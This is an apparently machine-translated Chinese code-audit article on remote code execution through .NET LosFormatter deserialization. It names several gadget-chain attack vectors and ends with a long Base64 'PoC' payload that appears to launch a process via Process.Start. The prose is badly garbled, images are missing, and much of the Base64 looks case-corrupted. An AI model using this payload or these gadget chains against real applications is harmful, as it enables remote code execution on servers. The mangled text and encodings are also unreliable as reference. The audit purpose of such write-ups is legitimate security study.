. NET advanced code audit, the eleventh classes LosFormatter to deserialize vulnerability-vulnerability warning-the black bar safety net

LosFormatter is generally used to serialize and deserialize the Web form page’s view state(the ViewState), if you want to put the ViewState through a database or other persistence devices to maintain, it requires the use of specific LosFormatter class to serialize/deserialized. It is encapsulated in the System. Web. dll, located in the namespace System. Web. UI, the Microsoft official explained, is the limited object serialization LOS format specifically for the height of the streamlining of the ASCII format of the serialization, this class supports serializing any object graph. But the use of deserializing untrusted binary file causes deserialization vulnerability enabling remote RCE attack, the article author from the principles and the code of audit perspective to do the relevant description and reproduction.

0x01 LosFormatter serialization
LosFormatter class is typically used for the ViewState of the page status view of serialization, see the following example to illustrate the problem, first define the TestClass object
! [](/Article/UploadPic/2019-4/2019418145413660. png)
Defines three members, and implements a static method ClassMethod start the process. Serialization by creating an object instance, respectively, to assign values to members
! [](/Article/UploadPic/2019-4/2019418145413756. png)
Conventional case of using the Serialize to obtain the serialization of after the file content is Base64 encoded
/wEypgEAAQAAAP////8BAAAAAAAAAAwCAAAAPldwZkFwcDEsIFzlcnnpb249ms4wljaumcwgq3vsdhvyzt1uzxv0cmfslcbqdwjsawnlzxlub2tlbj1udwxsbqeaaaarv3bmqxbwms5uzxn0q2xhc3mdaaaacwnsyxnzbmftzqruyw1la2fnzqebaagcaaaabgmaaaadmzywbgqaaaahsxzhbjflzriaaaal

0x02 LosFormatter to deserialize
2.1, deserialization usage
The reverse sequence of the process is to convert the Base64 encoded data for the object by creating a new object way of calling the Deserialize method to achieve, a view defined as follows
! [](/Article/UploadPic/2019-4/2019418145413502. png)
The author by creating a new object call the Deserialize method to achieve the specific implementation code can refer to the following
! [](/Article/UploadPic/2019-4/2019418145414139. png)
Deserialize obtained after the TestClass class of members the Name of the value.
! [](/Article/UploadPic/2019-4/2019418145414703. png)
2.2, the attack vector—ActivitySurrogateSelector
Because before has been introduced a vulnerability principle, so this article is no longer redundant to the narrative, not to see friends, please refer to the. NET advanced code audit, the eighth classes SoapFormatter deserialization vulnerability of, the difference is to use the LosFormatter class to serialize the data, also by Override ISerializationSurrogate call custom code to get the serialized data
! [](/Article/UploadPic/2019-4/2019418145414880. png)
In accordance with the practice of using LosFormatter class the Deserialize method deserializes it can successfully trigger the calculator.
! [](/Article/UploadPic/2019-4/2019418145414504. png)
! [](/Article/UploadPic/2019-4/2019418145414845. png)
2.3, the attack vector—PSObject
Thanks to the author of the windows host played a CVE-2017-8565 Windows PowerShell remote code execution vulnerability, the patch, the use of unsuccessful, so here is not do the in-depth discussion, interested friends can own research. About the patch details reference:
https://support.microsoft.com/zh-cn/help/4025872/windows-powershell-remote-code-execution-vulnerability
2.4, the attack vector—MulticastDelegate
Because before has been introduced a vulnerability principle, so this article is no longer redundant to the narrative, not to see friends, please refer to the. NET advanced code audit of the seven classes NetDataContractSerializer deserializing vulnerability of

0x03 code audit perspective
3.1, the Deserialize
From the code audit of the angle to find the vulnerability of the EntryPoint, And Deserialize there are two overloads were can deserialize the Stream and string data, where strings can be Raw Raw may also be the document that the Base64 string, both in the actual deserialization can be successful.
!
The following is unsafe code:
! [](/Article/UploadPic/2019-4/2019418145414943. png)
The attacker only needs to control the incoming string parameter is the Content you can easily achieve a deserialization vulnerability attack, complete the Poc are as follows
/wEyxBEAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmvyc2lvbj00ljaumc4wlcbddwx0dxjlpw5ldxryywwsifb1ymxpy0tlevrva2vupwi3n2e1yzu2mtkznguwodkfaqaaaiqbu3lzdgvtlknvbgxly3rpb25zlkdlbmvyawmuu29ydgvku2v0ydfbw1n5c3rlbs5tdhjpbmcsig1zy29ybglilcbwzxjzaw9uptqumc4wljasien1bhr1cmu9bmv1dhjhbcwguhvibgljs2v5vg9rzw49yjc3ytvjntyxotm0zta4ov1dbaaaaavdb3vudahdb21wyxjlcgdwzxjzaw9ubul0zw1zaamabginavn5c3rlbs5db2xszwn0aw9ucy5hzw5lcmljlknvbxbhcmlzb25db21wyxjlcmaxw1ttexn0zw0uu3ryaw5nlcbtc2nvcmxpyiwgvmvyc2lvbj00ljaumc4wlcbddwx0dxjlpw5ldxryywwsifb1ymxpy0tlevrva2vupwi3n2e1yzu2mtkznguwodldxqgcaaaaagaaaakdaaaaagaaaakeaaaabamaaacnavn5c3rlbs5db2xszwn0aw9ucy5hzw5lcmljlknvbxbhcmlzb25db21wyxjlcmaxw1ttexn0zw0uu3ryaw5nlcbtc2nvcmxpyiwgvmvyc2lvbj00ljaumc4wlcbddwx0dxjlpw5ldxryywwsifb1ymxpy0tlevrva2vupwi3n2e1yzu2mtkznguwodldxqeaaaalx2nvbxbhcmlzb24diln5c3rlbs5ezwxlz2f0zvnlcmlhbgl6yxrpb25ib2xkzxijbqaaabeeaaaaagaaaaygaaaacy9jignhbgmuzxhlbgcaaaady21kbauaaaaiu3lzdgvtlkrlbgvnyxrlu2vyawfsaxphdglvbkhvbgrlcgmaaaairgvszwdhdguhbwv0ag9kmadtzxrob2qxawmdmfn5c3rlbs5ezwxlz2f0zvnlcmlhbgl6yxrpb25ib2xkzxirrgvszwdhdgvfbnryes9texn0zw0uumvmbgvjdglvbi5nzw1izxjjbmzvu2vyawfsaxphdglvbkhvbgrlci9texn0zw0uumvmbgvjdglvbi5nzw1izxjjbmzvu2vyawfsaxphdglvbkhvbgrlcgkiaaaacqkaaaajcgaaaaqiaaaamfn5c3rlbs5ezwxlz2f0zvnlcmlhbgl6yxrpb25ib2xkzxirrgvszwdhdgvfbnryeqcaaaaedhlwzqhhc3nlbwjseqz0yxjnzxqsdgfyz2v0vhlwzufzc2vtymx5dnrhcmdldfr5cgvoyw1lcm1ldghvze5hbwunzgvszwdhdgvfbnryeqebagebaqmwu3lzdgvtlkrlbgvnyxrlu2vyawfsaxphdglvbkhvbgrlcitezwxlz2f0zuvudhj5bgsaaacwaln5c3rlbs5gdw5jydnbw1n5c3rlbs5tdhjpbmcsig1zy29ybglilcbwzxjzaw9uptqumc4wljasien1bhr1cmu9bmv1dhjhbcwguhvibgljs2v5vg9rzw49yjc3ytvjntyxotm0zta4ov0sw1n5c3rlbs5tdhjpbmcsig1zy29ybglilcbwzxjzaw9uptqumc4wljasien1bhr1cmu9bmv1dhjhbcwguhvibgljs2v5vg9rzw49yjc3ytvjntyxotm0zTA4OV0sW1N5c3RlbS5EaWFnbm9zdGljcy5qcm9jzxnzlcbtexn0zw0sifzlcnnpb249nc4wljaumcwgq3vsdhvyzt1uzxv0cmfslcbqdwjsawnlzxlub2tlbj1inzdhnwm1nje5mzrlmdg5xv0gdaaaaettc2nvcmxpyiwgvmvyc2lvbj00ljaumc4wlcbddwx0dxjlpw5ldxryywwsifb1ymxpy0tlevrva2vupwi3n2e1yzu2mtkznguwodkkbg0aaabju3lzdgvtlcbwzxjzaw9uptqumc4wljasien1bhr1cmu9bmv1dhjhbcwguhvibgljs2v5vg9rzw49yjc3ytvjntyxotm0zta4oqyoaaaagln5c3rlbs5eawfnbm9zdgljcy5qcm9jzxnzbg8aaaafu3rhcnqjeaaaaaqjaaaal1n5c3rlbs5szwzszwn0aw9ulk1lbwjlckluzm9tzxjpywxpemf0aw9usg9szgvybwaaaaroyw1ldefzc2vtymx5tmftzqldbgfzc05hbwuju2lnbmf0dxjlclnpz25hdhvyztiktwvtymvyvhlwzrbhzw5lcmljqxjndw1lbnrzaqebaqeaawgnu3lzdgvtllr5cgvbxqkpaaaacq0aaaajdgaaaayuaaaapln5c3rlbs5eawfnbm9zdgljcy5qcm9jzxnzifn0yxj0kfn5c3rlbs5tdhjpbmcsifn5c3rlbs5tdhjpbmcpbhuaaaa+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3mgu3rhcnqou3lzdgvtlln0cmluzywgu3lzdgvtlln0cmluzykiaaaacgekaaaacqaaaaywaaaab0nvbxbhcmujdaaaaayyaaaadvn5c3rlbs5tdhjpbmcggqaaactjbnqzmibdb21wyxjlkfn5c3rlbs5tdhjpbmcsifn5c3rlbs5tdhjpbmcpbhoaaaayu3lzdgvtlkluddmyienvbxbhcmuou3lzdgvtlln0cmluzywgu3lzdgvtlln0cmluzykiaaaacgeqaaaacaaaaaybaaaacvn5c3rlbs5db21wyxjpc29uydfbw1n5c3rlbs5tdhjpbmcsig1zy29ybglilcbwzxjzaw9uptqumc4wljasien1bhr1cmu9bmv1dhjhbcwguhvibgljs2v5vg9rzw49yjc3ytvjntyxotm0zta4ov1dcqwaaaakcqwaaaajgaaaaakwaaaacgs=

[1] [2] next